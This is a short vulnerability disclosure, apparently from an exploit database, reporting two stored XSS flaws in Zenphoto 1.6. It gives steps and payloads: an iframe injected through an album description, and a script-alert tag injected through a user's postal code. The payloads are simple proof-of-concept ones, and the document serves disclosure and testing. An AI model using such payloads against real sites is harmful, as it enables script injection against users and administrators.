Exploit Title: Zenphoto 1.6- Multiple stored XSS
Application: Zenphoto-1.6 xss poc
Version:1.6
Bugs:XSS
Technology: PHP
Vendor URL: https://www.zenphoto.org/news/zenphoto-1.6/
Software Link: https://github.com/zenphoto/zenphoto/archive/v1.6.zip
Date of found:01-05-2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================###XSS-1###
steps:1. create new album
2. write Album Description :<iframe src="https://14.rs"></iframe>3. save and view albumhttp://localhost/zenphoto-1.6/index.php?album=new-album or http://localhost/zenphoto-1.6/=====================================================###XSS-2###
steps:1. go to user account and change user data (http://localhost/zenphoto-1.6/zp-core/admin-users.php?page=users)2.change postal codeas <script>alert(4)</script>3.if admin user information importas html , xss will trigger
poc video : https://youtu.be/JKdC980ZbLY
